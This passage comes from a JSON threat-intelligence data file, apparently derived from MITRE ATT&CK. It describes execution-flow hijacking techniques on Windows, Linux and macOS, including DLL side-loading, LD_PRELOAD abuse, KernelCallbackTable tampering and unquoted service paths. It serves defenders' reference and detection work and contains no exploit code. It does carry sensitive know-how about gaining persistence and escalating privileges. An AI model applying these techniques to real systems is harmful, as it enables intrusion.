"description": "Adversaries may leverage the COR_PROFILER environment variable to hijack the execution flow of programs that load the .NET CLR. The COR_PROFILER is a .NET Framework feature which allows developers to specify an unmanaged (or external of .NET) profiling DLL to be loaded into each .NET process that loads the Common Language Runtime (CLR). These profilers are designed to monitor, troubleshoot, and debug managed code executed by the .NET CLR.<sup>[[Microsoft Profiling Mar 2017](https://app.tidalcyber.com/references/eb0909ea-616c-4d79-b145-ee2f1ae539fb)]</sup><sup>[[Microsoft COR_PROFILER Feb 2013](https://app.tidalcyber.com/references/4e85ef68-dfb7-4db3-ac76-92f4b78cb1cd)]</sup>\n\nThe COR_PROFILER environment variable can be set at various scopes (system, user, or process) resulting in different levels of influence. System and user-wide environment variable scopes are specified in the Registry, where a [Component Object Model](https://app.tidalcyber.com/technique/8bc683db-1311-476f-8cae-45f3f89dcc66) (COM) object can be registered as a profiler DLL. A process scope COR_PROFILER can also be created in-memory without modifying the Registry. Starting with .NET Framework 4, the profiling DLL does not need to be registered as long as the location of the DLL is specified in the COR_PROFILER_PATH environment variable.<sup>[[Microsoft COR_PROFILER Feb 2013](https://app.tidalcyber.com/references/4e85ef68-dfb7-4db3-ac76-92f4b78cb1cd)]</sup>\n\nAdversaries may abuse COR_PROFILER to establish persistence that executes a malicious DLL in the context of all .NET processes every time the CLR is invoked. The COR_PROFILER can also be used to elevate privileges (ex: [Bypass User Account Control](https://app.tidalcyber.com/technique/5e1499a1-f1ad-4929-84e1-5d33c371c02d)) if the victim .NET process executes at a higher permission level, as well as to hook and [Impair Defenses](https://app.tidalcyber.com/technique/e3be3d76-0a36-4060-8003-3b39c557f728) provided by .NET processes.<sup>[[RedCanary Mockingbird May 2020](https://app.tidalcyber.com/references/596bfbb3-72e0-4d4c-a1a9-b8d54455ffd0)]</sup><sup>[[Red Canary COR_PROFILER May 2020](https://app.tidalcyber.com/references/3d8cb4d3-1cbe-416a-95b5-15003cbc2beb)]</sup><sup>[[Almond COR_PROFILER Apr 2019](https://app.tidalcyber.com/references/a49c5870-2a48-4cd7-8b4e-e80c5414f565)]</sup><sup>[[GitHub OmerYa Invisi-Shell](https://app.tidalcyber.com/references/26c1b8f4-ff59-409e-b616-04eee38a8a9f)]</sup><sup>[[subTee .NET Profilers May 2017](https://app.tidalcyber.com/references/6ef42019-5393-423e-811d-29b728c877e1)]</sup>",
"meta": {
"source": "MITRE",
"technique_attack_id": "T1574.012"
},
"related": [
{
"dest-uuid": "ec4f9786-c00c-430a-bc6d-0d0d22fdd393",
"type": "uses"
},
{
"dest-uuid": "b17dde68-dbcf-4cfd-9bb8-be014ec65c37",
"type": "uses"
},
{
"dest-uuid": "8e29c6c9-0c10-4bb0-827d-ff0ab8922726",
"type": "uses"
}
],
"uuid": "110c385f-9f27-4fd6-837c-6261294073ab",
"value": "COR_PROFILER"
},
{
"description": "Adversaries may execute their own malicious payloads by hijacking the search order used to load DLLs. Windows systems use a common method to look for required DLLs to load into a program. <sup>[[Microsoft Dynamic Link Library Search Order](https://app.tidalcyber.com/references/7b1f945b-2547-4bc6-98bf-30248bdf3587)]</sup><sup>[[FireEye Hijacking July 2010](https://app.tidalcyber.com/references/536f9987-f3b6-4d5f-8a6b-32a0c651500d)]</sup> Hijacking DLL loads may be for the purpose of establishing persistence as well as elevating privileges and/or evading restrictions on file execution.\n\nThere are many ways an adversary can hijack DLL loads. Adversaries may plant trojan dynamic-link library files (DLLs) in a directory that will be searched before the location of a legitimate library that will be requested by a program, causing Windows to load their malicious library when it is called for by the victim program. Adversaries may also perform DLL preloading, also called binary planting attacks, <sup>[[OWASP Binary Planting](https://app.tidalcyber.com/references/86fc5a62-385e-4c56-9812-138db0808fba)]</sup> by placing a malicious DLL with the same name as an ambiguously specified DLL in a location that Windows searches before the legitimate DLL. Often this location is the current working directory of the program.<sup>[[FireEye fxsst June 2011](https://app.tidalcyber.com/references/06f8f5b2-2ebe-4210-84b6-f86e911a7118)]</sup> Remote DLL preloading attacks occur when a program sets its current directory to a remote location such as a Web share before loading a DLL. <sup>[[Microsoft Security Advisory 2269637](https://app.tidalcyber.com/references/fa3d303e-bb1a-426d-9387-e92fc1ea75bc)]</sup>\n\nAdversaries may also directly modify the search order via DLL redirection, which after being enabled (in the Registry and creation of a redirection file) may cause a program to load a different DLL.<sup>[[Microsoft Dynamic-Link Library Redirection](https://app.tidalcyber.com/references/72458590-ee1b-4447-adb8-ca4f486d1db5)]</sup><sup>[[Microsoft Manifests](https://app.tidalcyber.com/references/e336dc02-c7bb-4046-93d9-17b9512fb731)]</sup><sup>[[FireEye DLL Search Order Hijacking](https://app.tidalcyber.com/references/0ba2675d-4d7f-406a-81fa-b87e62d7a539)]</sup>\n\nIf a search order-vulnerable program is configured to run at a higher privilege level, then the adversary-controlled DLL that is loaded will also be executed at the higher level. In this case, the technique could be used for privilege escalation from user to administrator or SYSTEM or from administrator to SYSTEM, depending on the program. Programs that fall victim to path hijacking may appear to behave normally because malicious DLLs may be configured to also load the legitimate DLLs they were meant to replace.",
"meta": {
"source": "MITRE",
"technique_attack_id": "T1574.001"
},
"related": [
{
"dest-uuid": "ec4f9786-c00c-430a-bc6d-0d0d22fdd393",
"type": "uses"
},
{
"dest-uuid": "b17dde68-dbcf-4cfd-9bb8-be014ec65c37",
"type": "uses"
},
{
"dest-uuid": "8e29c6c9-0c10-4bb0-827d-ff0ab8922726",
"type": "uses"
}
],
"uuid": "69cd62f8-b729-4a05-8351-5bb961f7c6d6",
"value": "DLL Search Order Hijacking"
},
{
"description": "Adversaries may execute their own malicious payloads by side-loading DLLs. Similar to [DLL Search Order Hijacking](https://app.tidalcyber.com/technique/69cd62f8-b729-4a05-8351-5bb961f7c6d6), side-loading involves hijacking which DLL a program loads. But rather than just planting the DLL within the search order of a program then waiting for the victim application to be invoked, adversaries may directly side-load their payloads by planting then invoking a legitimate application that executes their payload(s).\n\nSide-loading takes advantage of the DLL search order used by the loader by positioning both the victim application and malicious payload(s) alongside each other. Adversaries likely use side-loading as a means of masking actions they perform under a legitimate, trusted, and potentially elevated system or software process. Benign executables used to side-load payloads may not be flagged during delivery and/or execution. Adversary payloads may also be encrypted/packed or otherwise obfuscated until loaded into the memory of the trusted process.<sup>[[FireEye DLL Side-Loading](https://app.tidalcyber.com/references/9d58bcbb-5b96-4e12-8ff2-e0b084c3eb8c)]</sup>",
"meta": {
"source": "MITRE",
"technique_attack_id": "T1574.002"
},
"related": [
{
"dest-uuid": "ec4f9786-c00c-430a-bc6d-0d0d22fdd393",
"type": "uses"
},
{
"dest-uuid": "b17dde68-dbcf-4cfd-9bb8-be014ec65c37",
"type": "uses"
},
{
"dest-uuid": "8e29c6c9-0c10-4bb0-827d-ff0ab8922726",
"type": "uses"
}
],
"uuid": "7851bfe7-f149-47f5-9970-66d7cc4fdbe6",
"value": "DLL Side-Loading"
},
{
"description": "Adversaries may execute their own payloads by placing a malicious dynamic library (dylib) with an expected name in a path a victim application searches at runtime. The dynamic loader will try to find the dylibs based on the sequential order of the search paths. Paths to dylibs may be prefixed with <code>@rpath</code>, which allows developers to use relative paths to specify an array of search paths used at runtime based on the location of the executable. Additionally, if weak linking is used, such as the <code>LC_LOAD_WEAK_DYLIB</code> function, an application will still execute even if an expected dylib is not present. Weak linking enables developers to run an application on multiple macOS versions as new APIs are added.\n\nAdversaries may gain execution by inserting malicious dylibs with the name of the missing dylib in the identified path.<sup>[[Wardle Dylib Hijack Vulnerable Apps](https://app.tidalcyber.com/references/128b4e3f-bb58-45e0-b8d9-bff9fc3ec3df)]</sup><sup>[[Wardle Dylib Hijacking OSX 2015](https://app.tidalcyber.com/references/c78d8c94-4fe3-4aa9-b879-f0b0e9d2714b)]</sup><sup>[[Github EmpireProject HijackScanner](https://app.tidalcyber.com/references/c83e8833-9648-4178-b5be-6fa0af8f737f)]</sup><sup>[[Github EmpireProject CreateHijacker Dylib](https://app.tidalcyber.com/references/2908418d-54cf-4245-92c6-63f616b04e91)]</sup> Dylibs are loaded into an application's address space allowing the malicious dylib to inherit the application's privilege level and resources. Based on the application, this could result in privilege escalation and uninhibited network access. This method may also evade detection from security products since the execution is masked under a legitimate process.<sup>[[Writing Bad Malware for OSX](https://app.tidalcyber.com/references/5628ecd9-48da-4a50-94ba-4b70abe56089)]</sup><sup>[[wardle artofmalware volume1](https://app.tidalcyber.com/references/53d0279e-4f30-4bbe-a9c7-90e36cd81570)]</sup><sup>[[MalwareUnicorn macOS Dylib Injection MachO](https://app.tidalcyber.com/references/61aae3a4-317e-4117-a02a-27885709fb07)]</sup>",
"meta": {
"source": "MITRE",
"technique_attack_id": "T1574.004"
},
"related": [
{
"dest-uuid": "ec4f9786-c00c-430a-bc6d-0d0d22fdd393",
"type": "uses"
},
{
"dest-uuid": "b17dde68-dbcf-4cfd-9bb8-be014ec65c37",
"type": "uses"
},
{
"dest-uuid": "8e29c6c9-0c10-4bb0-827d-ff0ab8922726",
"type": "uses"
}
],
"uuid": "6c8fa277-33c3-45b5-8f0d-9b1c0ccaf284",
"value": "Dylib Hijacking"
},
{
"description": "Adversaries may execute their own malicious payloads by hijacking environment variables the dynamic linker uses to load shared libraries. During the execution preparation phase of a program, the dynamic linker loads specified absolute paths of shared libraries from environment variables and files, such as <code>LD_PRELOAD</code> on Linux or <code>DYLD_INSERT_LIBRARIES</code> on macOS. Libraries specified in environment variables are loaded first, taking precedence over system libraries with the same function name.<sup>[[Man LD.SO](https://app.tidalcyber.com/references/a8a16cf6-0482-4e98-a39a-496491f985df)]</sup><sup>[[TLDP Shared Libraries](https://app.tidalcyber.com/references/2862845b-72b3-41d8-aafb-b36e90c6c30a)]</sup><sup>[[Apple Doco Archive Dynamic Libraries](https://app.tidalcyber.com/references/e3b8cc52-2096-418c-b291-1bc76022961d)]</sup> These variables are often used by developers to debug binaries without needing to recompile, deconflict mapped symbols, and implement custom functions without changing the original library.<sup>[[Baeldung LD_PRELOAD](https://app.tidalcyber.com/references/6fd6ea96-1cf4-4169-8069-4f29dbc9f217)]</sup>\n\nOn Linux and macOS, hijacking dynamic linker variables may grant access to the victim process's memory, system/network resources, and possibly elevated privileges. This method may also evade detection from security products since the execution is masked under a legitimate process. Adversaries can set environment variables via the command line using the <code>export</code> command, <code>setenv</code> function, or <code>putenv</code> function. Adversaries can also leverage [Dynamic Linker Hijacking](https://app.tidalcyber.com/technique/b0d884c3-cf87-4610-992d-4ec54c667759) to export variables in a shell or set variables programmatically using higher level syntax such Pythons <code>os.environ</code>.\n\nOn Linux, adversaries may set <code>LD_PRELOAD</code> to point to malicious libraries that match the name of legitimate libraries which are requested by a victim program, causing the operating system to load the adversary's malicious code upon execution of the victim program. <code>LD_PRELOAD</code> can be set via the environment variable or <code>/etc/ld.so.preload</code> file.<sup>[[Man LD.SO](https://app.tidalcyber.com/references/a8a16cf6-0482-4e98-a39a-496491f985df)]</sup><sup>[[TLDP Shared Libraries](https://app.tidalcyber.com/references/2862845b-72b3-41d8-aafb-b36e90c6c30a)]</sup> Libraries specified by <code>LD_PRELOAD</code> are loaded and mapped into memory by <code>dlopen()</code> and <code>mmap()</code> respectively.<sup>[[Code Injection on Linux and macOS](https://app.tidalcyber.com/references/82d41fd8-495d-41b6-b908-6ada5764c94d)]</sup><sup>[[Uninformed Needle](https://app.tidalcyber.com/references/5ac2d917-756f-48d0-ab32-648b45a29083)]</sup> <sup>[[Phrack halfdead 1997](https://app.tidalcyber.com/references/9b3f0dc7-d830-43c5-8a5b-ad3c811920c5)]</sup><sup>[[Brown Exploiting Linkers](https://app.tidalcyber.com/references/24674e91-5cbf-4023-98ae-a9f0968ad99a)]</sup> \n\nOn macOS this behavior is conceptually the same as on Linux, differing only in how the macOS dynamic libraries (dyld) is implemented at a lower level. Adversaries can set the <code>DYLD_INSERT_LIBRARIES</code> environment variable to point to malicious libraries containing names of legitimate libraries or functions requested by a victim program.<sup>[[TheEvilBit DYLD_INSERT_LIBRARIES](https://app.tidalcyber.com/references/bd27026c-81eb-480e-b092-f861472ac775)]</sup><sup>[[Timac DYLD_INSERT_LIBRARIES](https://app.tidalcyber.com/references/54fcbc49-f4e3-48a4-9d67-52ca08b322b2)]</sup><sup>[[Gabilondo DYLD_INSERT_LIBRARIES Catalina Bypass](https://app.tidalcyber.com/references/67f3ce33-0197-41ef-a9d0-474c97ecf570)]</sup> ",
"meta": {
"source": "MITRE",
"technique_attack_id": "T1574.006"
},
"related": [
{
"dest-uuid": "ec4f9786-c00c-430a-bc6d-0d0d22fdd393",
"type": "uses"
},
{
"dest-uuid": "b17dde68-dbcf-4cfd-9bb8-be014ec65c37",
"type": "uses"
},
{
"dest-uuid": "8e29c6c9-0c10-4bb0-827d-ff0ab8922726",
"type": "uses"
}
],
"uuid": "b0d884c3-cf87-4610-992d-4ec54c667759",
"value": "Dynamic Linker Hijacking"
},
{
"description": "Adversaries may execute their own malicious payloads by hijacking the binaries used by an installer. These processes may automatically execute specific binaries as part of their functionality or to perform other actions. If the permissions on the file system directory containing a target binary, or permissions on the binary itself, are improperly set, then the target binary may be overwritten with another binary using user-level permissions and executed by the original process. If the original process and thread are running under a higher permissions level, then the replaced binary will also execute under higher-level permissions, which could include SYSTEM.\n\nAnother variation of this technique can be performed by taking advantage of a weakness that is common in executable, self-extracting installers. During the installation process, it is common for installers to use a subdirectory within the <code>%TEMP%</code> directory to unpack binaries such as DLLs, EXEs, or other payloads. When installers create subdirectories and files they often do not set appropriate permissions to restrict write access, which allows for execution of untrusted code placed in the subdirectories or overwriting of binaries used in the installation process. This behavior is related to and may take advantage of [DLL Search Order Hijacking](https://app.tidalcyber.com/technique/69cd62f8-b729-4a05-8351-5bb961f7c6d6).\n\nAdversaries may use this technique to replace legitimate binaries with malicious ones as a means of executing code at a higher permissions level. Some installers may also require elevated privileges that will result in privilege escalation when executing adversary controlled code. This behavior is related to [Bypass User Account Control](https://app.tidalcyber.com/technique/5e1499a1-f1ad-4929-84e1-5d33c371c02d). Several examples of this weakness in existing common installers have been reported to software vendors.<sup>[[mozilla_sec_adv_2012](https://app.tidalcyber.com/references/cd720550-a0b5-4d1d-85dd-98da97f45b62)]</sup> <sup>[[Executable Installers are Vulnerable](https://app.tidalcyber.com/references/5c2791d4-556d-426a-b305-44e23b50f013)]</sup> If the executing process is set to run at a specific time or during a certain event (e.g., system bootup) then this technique can also be used for persistence.",
"meta": {
"source": "MITRE",
"technique_attack_id": "T1574.005"
},
"related": [
{
"dest-uuid": "ec4f9786-c00c-430a-bc6d-0d0d22fdd393",
"type": "uses"
},
{
"dest-uuid": "b17dde68-dbcf-4cfd-9bb8-be014ec65c37",
"type": "uses"
},
{
"dest-uuid": "8e29c6c9-0c10-4bb0-827d-ff0ab8922726",
"type": "uses"
}
],
"uuid": "1f6a471d-49c6-4150-b213-2422d5fd3f26",
"value": "Executable Installer File Permissions Weakness"
},
{
"description": "Adversaries may abuse the <code>KernelCallbackTable</code> of a process to hijack its execution flow in order to run their own payloads.<sup>[[Lazarus APT January 2022](https://app.tidalcyber.com/references/fbd96014-16c3-4ad6-bb3f-f92d15efce13)]</sup><sup>[[FinFisher exposed ](https://app.tidalcyber.com/references/b2f4541e-f981-4b25-abf4-1bec92b16faa)]</sup> The <code>KernelCallbackTable</code> can be found in the Process Environment Block (PEB) and is initialized to an array of graphic functions available to a GUI process once <code>user32.dll</code> is loaded.<sup>[[Windows Process Injection KernelCallbackTable](https://app.tidalcyber.com/references/01a3fc64-ff07-48f7-b0d9-5728012761c7)]</sup>\n\nAn adversary may hijack the execution flow of a process using the <code>KernelCallbackTable</code> by replacing an original callback function with a malicious payload. Modifying callback functions can be achieved in various ways involving related behaviors such as [Reflective Code Loading](https://app.tidalcyber.com/technique/ef85800b-080d-4739-9f3b-91b61314a93e) or [Process Injection](https://app.tidalcyber.com/technique/7a6208ac-c75e-4e73-8969-0aaf6085cb6e) into another process.\n\nA pointer to the memory address of the <code>KernelCallbackTable</code> can be obtained by locating the PEB (ex: via a call to the <code>NtQueryInformationProcess()</code> [Native API](https://app.tidalcyber.com/technique/1120f5ec-ef1b-4596-8d8b-a3979a766560) function).<sup>[[NtQueryInformationProcess](https://app.tidalcyber.com/references/7b533ca9-9075-408d-b125-89bc7446ec8f)]</sup> Once the pointer is located, the <code>KernelCallbackTable</code> can be duplicated, and a function in the table (e.g., <code>fnCOPYDATA</code>) set to the address of a malicious payload (ex: via <code>WriteProcessMemory()</code>). The PEB is then updated with the new address of the table. Once the tampered function is invoked, the malicious payload will be triggered.<sup>[[Lazarus APT January 2022](https://app.tidalcyber.com/references/fbd96014-16c3-4ad6-bb3f-f92d15efce13)]</sup>\n\nThe tampered function is typically invoked using a Windows message. After the process is hijacked and malicious code is executed, the <code>KernelCallbackTable</code> may also be restored to its original state by the rest of the malicious payload.<sup>[[Lazarus APT January 2022](https://app.tidalcyber.com/references/fbd96014-16c3-4ad6-bb3f-f92d15efce13)]</sup> Use of the <code>KernelCallbackTable</code> to hijack execution flow may evade detection from security products since the execution can be masked under a legitimate process.",
"meta": {
"source": "MITRE",
"technique_attack_id": "T1574.013"
},
"related": [
{
"dest-uuid": "ec4f9786-c00c-430a-bc6d-0d0d22fdd393",
"type": "uses"
},
{
"dest-uuid": "b17dde68-dbcf-4cfd-9bb8-be014ec65c37",
"type": "uses"
},
{
"dest-uuid": "8e29c6c9-0c10-4bb0-827d-ff0ab8922726",
"type": "uses"
}
],
"uuid": "68ffdbed-08d8-46a2-a833-984bbf0d9b4a",
"value": "KernelCallbackTable"
},
{
"description": "Adversaries may execute their own malicious payloads by hijacking environment variables used to load libraries. The PATH environment variable contains a list of directories (User and System) that the OS searches sequentially through in search of the binary that was called from a script or the command line. \n\nAdversaries can place a malicious program in an earlier entry in the list of directories stored in the PATH environment variable, resulting in the operating system executing the malicious binary rather than the legitimate binary when it searches sequentially through that PATH listing.\n\nFor example, on Windows if an adversary places a malicious program named \"net.exe\" in `C:\\example path`, which by default precedes `C:\\Windows\\system32\\net.exe` in the PATH environment variable, when \"net\" is executed from the command-line the `C:\\example path` will be called instead of the system's legitimate executable at `C:\\Windows\\system32\\net.exe`. Some methods of executing a program rely on the PATH environment variable to determine the locations that are searched when the path for the program is not given, such as executing programs from a [Command and Scripting Interpreter](https://app.tidalcyber.com/technique/a2184d53-63b1-4c40-81ed-da799080c36c).<sup>[[ExpressVPN PATH env Windows 2021](https://app.tidalcyber.com/references/26096485-1dd6-512a-a2a1-27dbbfb6fde0)]</sup>\n\nAdversaries may also directly modify the $PATH variable specifying the directories to be searched. An adversary can modify the `$PATH` variable to point to a directory they have write access. When a program using the $PATH variable is called, the OS searches the specified directory and executes the malicious binary. On macOS, this can also be performed through modifying the $HOME variable. These variables can be modified using the command-line, launchctl, [Unix Shell Configuration Modification](https://app.tidalcyber.com/technique/cc5ae19f-981d-4004-bb74-260b8ebad73a), or modifying the `/etc/paths.d` folder contents.<sup>[[uptycs Fake POC linux malware 2023](https://app.tidalcyber.com/references/edc18649-2fcf-5fb3-a717-db4bb28ca25f)]</sup><sup>[[nixCraft macOS PATH variables](https://app.tidalcyber.com/references/83daecf1-8708-56da-aaad-1e7e95c4ea43)]</sup><sup>[[Elastic Rules macOS launchctl 2022](https://app.tidalcyber.com/references/04b0582e-357f-5f2a-8582-b3bf8f52c2a2)]</sup>",
"meta": {
"source": "MITRE",
"technique_attack_id": "T1574.007"
},
"related": [
{
"dest-uuid": "ec4f9786-c00c-430a-bc6d-0d0d22fdd393",
"type": "uses"
},
{
"dest-uuid": "b17dde68-dbcf-4cfd-9bb8-be014ec65c37",
"type": "uses"
},
{
"dest-uuid": "8e29c6c9-0c10-4bb0-827d-ff0ab8922726",
"type": "uses"
}
],
"uuid": "0a4dd066-6a28-4dcb-ab3d-215fc01db9cb",
"value": "Path Interception by PATH Environment Variable"
},
{
"description": "Adversaries may execute their own malicious payloads by hijacking the search order used to load other programs. Because some programs do not call other programs using the full path, adversaries may place their own file in the directory where the calling program is located, causing the operating system to launch their malicious software at the request of the calling program.\n\nSearch order hijacking occurs when an adversary abuses the order in which Windows searches for programs that are not given a path. Unlike [DLL Search Order Hijacking](https://app.tidalcyber.com/technique/69cd62f8-b729-4a05-8351-5bb961f7c6d6), the search order differs depending on the method that is used to execute the program. <sup>[[Microsoft CreateProcess](https://app.tidalcyber.com/references/aa336e3a-464d-48ce-bebb-760b73764610)]</sup> <sup>[[Windows NT Command Shell](https://app.tidalcyber.com/references/aee1e76c-8ff2-4ff0-83e3-edcb76f34d19)]</sup> <sup>[[Microsoft WinExec](https://app.tidalcyber.com/references/9e1ae9ae-bafc-460a-891e-e75df01c96c4)]</sup> However, it is common for Windows to search in the directory of the initiating program before searching through the Windows system directory. An adversary who finds a program vulnerable to search order hijacking (i.e., a program that does not specify the path to an executable) may take advantage of this vulnerability by creating a program named after the improperly specified program and placing it within the initiating program's directory.\n\nFor example, \"example.exe\" runs \"cmd.exe\" with the command-line argument <code>net user</code>. An adversary may place a program called \"net.exe\" within the same directory as example.exe, \"net.exe\" will be run instead of the Windows system utility net. In addition, if an adversary places a program called \"net.com\" in the same directory as \"net.exe\", then <code>cmd.exe /C net user</code> will execute \"net.com\" instead of \"net.exe\" due to the order of executable extensions defined under PATHEXT. <sup>[[Microsoft Environment Property](https://app.tidalcyber.com/references/64598969-864d-4bc7-805e-c289cccb7bc6)]</sup>\n\nSearch order hijacking is also a common practice for hijacking DLL loads and is covered in [DLL Search Order Hijacking](https://app.tidalcyber.com/technique/69cd62f8-b729-4a05-8351-5bb961f7c6d6).",
"meta": {
"source": "MITRE",
"technique_attack_id": "T1574.008"
},
"related": [
{
"dest-uuid": "ec4f9786-c00c-430a-bc6d-0d0d22fdd393",
"type": "uses"
},
{
"dest-uuid": "b17dde68-dbcf-4cfd-9bb8-be014ec65c37",
"type": "uses"
},
{
"dest-uuid": "8e29c6c9-0c10-4bb0-827d-ff0ab8922726",
"type": "uses"
}
],
"uuid": "0df21d65-c885-415a-8f91-477ae1b37839",
"value": "Path Interception by Search Order Hijacking"
},
{
"description": "Adversaries may execute their own malicious payloads by hijacking vulnerable file path references. Adversaries can take advantage of paths that lack surrounding quotations by placing an executable in a higher level directory within the path, so that Windows will choose the adversary's executable to launch.\n\nService paths <sup>[[Microsoft CurrentControlSet Services](https://app.tidalcyber.com/references/cb9b5391-773f-4b56-8c41-d4f548c7b835)]</sup> and shortcut paths may also be vulnerable to path interception if the path has one or more spaces and is not surrounded by quotation marks (e.g., <code>C:\\unsafe path with space\\program.exe</code> vs. <code>\"C:\\safe path with space\\program.exe\"</code>). <sup>[[Help eliminate unquoted path](https://app.tidalcyber.com/references/23ad5a8c-cbe1-4f40-8757-f1784a4003a1)]</sup> (stored in Windows Registry keys) An adversary can place an executable in a higher level directory of the path, and Windows will resolve that executable instead of the intended executable. For example, if the path in a shortcut is <code>C:\\program files\\myapp.exe</code>, an adversary may create a program at <code>C:\\program.exe</code> that will be run instead of the intended program. <sup>[[Windows Unquoted Services](https://app.tidalcyber.com/references/30681a0a-a49f-416a-b5bc-621c60f1130a)]</sup> <sup>[[Windows Privilege Escalation Guide](https://app.tidalcyber.com/references/185154f2-5f2e-48bf-b609-991e9d6a037b)]</sup>\n\nThis technique can be used for persistence if executables are called on a regular basis, as well as privilege escalation if intercepted executables are started by a higher privileged process.",
"meta": {
"source": "MITRE",
"technique_attack_id": "T1574.009"
},
"related": [
{
"dest-uuid": "ec4f9786-c00c-430a-bc6d-0d0d22fdd393",
"type": "uses"
},
{
"dest-uuid": "b17dde68-dbcf-4cfd-9bb8-be014ec65c37",
"type": "uses"
},
{
"dest-uuid": "8e29c6c9-0c10-4bb0-827d-ff0ab8922726",
"type": "uses"
}
],
"uuid": "08188de6-22c8-42af-b01c-f1c250c22514",
"value": "Path Interception by Unquoted Path"
},
{
"description": "Adversaries may execute their own malicious payloads by hijacking the binaries used by services. Adversaries may use flaws in the permissions of Windows services to replace the binary that is executed upon service start. These service processes may automatically execute specific binaries as part of their functionality or to perform other actions. If the permissions on the file system directory containing a target binary, or permissions on the binary itself are improperly set, then the target binary may be overwritten with another binary using user-level permissions and executed by the original process. If the original process and thread are running under a higher permissions level, then the replaced binary will also execute under higher-level permissions, which could include SYSTEM.\n\nAdversaries may use this technique to replace legitimate binaries with malicious ones as a means of executing code at a higher permissions level. If the executing process is set to run at a specific time or during a certain event (e.g., system bootup) then this technique can also be used for persistence.",
"meta": {
"source": "MITRE",
"technique_attack_id": "T1574.010"
},
"related": [
{
"dest-uuid": "ec4f9786-c00c-430a-bc6d-0d0d22fdd393",
"type": "uses"
},
{
"dest-uuid": "b17dde68-dbcf-4cfd-9bb8-be014ec65c37",
"type": "uses"
},
{
"dest-uuid": "8e29c6c9-0c10-4bb0-827d-ff0ab8922726",
"type": "uses"
}
],
"uuid": "bd569ff9-c038-48c0-83d0-f5c784b439bc",
"value": "Services File Permissions Weakness"
},
{
"description": "Adversaries may execute their own malicious payloads by hijacking the Registry entries used by services. Adversaries may use flaws in the permissions for Registry keys related to services to redirect from the originally specified executable to one that they control, in order to launch their own code when a service starts. Windows stores local service configuration information in the Registry under <code>HKLM\\SYSTEM\\CurrentControlSet\\Services</code>. The information stored under a service's Registry keys can be manipulated to modify a service's execution parameters through tools such as the service controller, sc.exe, [PowerShell](https://app.tidalcyber.com/technique/6ca7838a-e8ad-43e8-9da6-15b640d1cbde), or [Reg](https://app.tidalcyber.com/software/d796615c-fa3d-4afd-817a-1a3db8c73532). Access to Registry keys is controlled through access control lists and user permissions. <sup>[[Registry Key Security](https://app.tidalcyber.com/references/f8f12cbb-029c-48b1-87ce-624a7f98c8ab)]</sup><sup>[[malware_hides_service](https://app.tidalcyber.com/references/c5982f65-1782-452a-9667-a8732d31e89a)]</sup>\n\nIf the permissions for users and groups are not properly set and allow access to the Registry keys for a service, adversaries may change the service's binPath/ImagePath to point to a different executable under their control. When the service starts or is restarted, then the adversary-controlled program will execute, allowing the adversary to establish persistence and/or privilege escalation to the account context the service is set to execute under (local/domain account, SYSTEM, LocalService, or NetworkService).\n\nAdversaries may also alter other Registry keys in the services Registry tree. For example, the <code>FailureCommand</code> key may be changed so that the service is executed in an elevated context anytime the service fails or is intentionally corrupted.<sup>[[Kansa Service related collectors](https://app.tidalcyber.com/references/d854f84a-4d70-4ef4-9197-d8f5396feabb)]</sup><sup>[[Tweet Registry Perms Weakness](https://app.tidalcyber.com/references/7757776d-b0e9-4a99-8a55-2cd1b248c4a0)]</sup>\n\nThe <code>Performance</code> key contains the name of a driver service's performance DLL and the names of several exported functions in the DLL.<sup>[[microsoft_services_registry_tree](https://app.tidalcyber.com/references/171cfdf1-d91c-4df3-831e-89b6237e3c8b)]</sup> If the <code>Performance</code> key is not already present and if an adversary-controlled user has the <code>Create Subkey</code> permission, adversaries may create the <code>Performance</code> key in the services Registry tree to point to a malicious DLL.<sup>[[insecure_reg_perms](https://app.tidalcyber.com/references/d18717ae-7fe4-40f9-aff2-b35120d31dc8)]</sup>\n\nAdversaries may also add the <code>Parameters</code> key, which stores driver-specific data, or other custom subkeys for their malicious services to establish persistence or enable other malicious activities.<sup>[[microsoft_services_registry_tree](https://app.tidalcyber.com/references/171cfdf1-d91c-4df3-831e-89b6237e3c8b)]</sup><sup>[[troj_zegost](https://app.tidalcyber.com/references/c3790ad6-704a-4076-8729-61b5df9d7983)]</sup> Additionally, If adversaries launch their malicious services using svchost.exe, the services file may be identified using <code>HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet\\Services\\servicename\\Parameters\\ServiceDll</code>.<sup>[[malware_hides_service](https://app.tidalcyber.com/references/c5982f65-1782-452a-9667-a8732d31e89a)]</sup>",
"meta": {
"source": "MITRE",
"technique_attack_id": "T1574.011"
},
"related": [
{
"dest-uuid": "ec4f9786-c00c-430a-bc6d-0d0d22fdd393",
"type": "uses"
},
{
"dest-uuid": "b17dde68-dbcf-4cfd-9bb8-be014ec65c37",
"type": "uses"
},
{
"dest-uuid": "8e29c6c9-0c10-4bb0-827d-ff0ab8922726",
"type": "uses"
}
],
"uuid": "bc996f67-7cb7-4ba4-9156-4f2f8283d66d",
"value": "Services Registry Permissions Weakness"
},
{
"description": "Adversaries may execute their own malicious payloads by hijacking the way operating systems run programs. Hijacking execution flow can be for the purposes of persistence, since this hijacked execution may reoccur over time. Adversaries may also use these mechanisms to elevate privileges or evade defenses, such as application control or other restrictions on execution.\n\nThere are many ways an adversary may hijack the flow of execution, including by manipulating how the operating system locates programs to be executed. How the operating system locates libraries to be used by a program can also be intercepted. Locations where the operating system looks for programs/resources, such as file directories and in the case of Windows the Registry, could also be poisoned to include malicious payloads.",
"meta": {
"platforms": [
"Linux",
"macOS",
"Windows"
],
"source": "MITRE"
},
"related": [
{
"dest-uuid": "ec4f9786-c00c-430a-bc6d-0d0d22fdd393",
"type": "uses"
},
{
"dest-uuid": "b17dde68-dbcf-4cfd-9bb8-be014ec65c37",
"type": "uses"
},
{
"dest-uuid": "8e29c6c9-0c10-4bb0-827d-ff0ab8922726",
"type": "uses"
},
{
"dest-uuid": "110c385f-9f27-4fd6-837c-6261294073ab",
"type": "similar"
},
{
"dest-uuid": "69cd62f8-b729-4a05-8351-5bb961f7c6d6",
"type": "similar"
},
{
"dest-uuid": "7851bfe7-f149-47f5-9970-66d7cc4fdbe6",
"type": "similar"
},
{
"dest-uuid": "6c8fa277-33c3-45b5-8f0d-9b1c0ccaf284",
"type": "similar"
},
{
"dest-uuid": "b0d884c3-cf87-4610-992d-4ec54c667759",
"type": "similar"
},
{
"dest-uuid": "1f6a471d-49c6-4150-b213-2422d5fd3f26",
"type": "similar"
},
{
"dest-uuid": "68ffdbed-08d8-46a2-a833-984bbf0d9b4a",
"type": "similar"
},
{
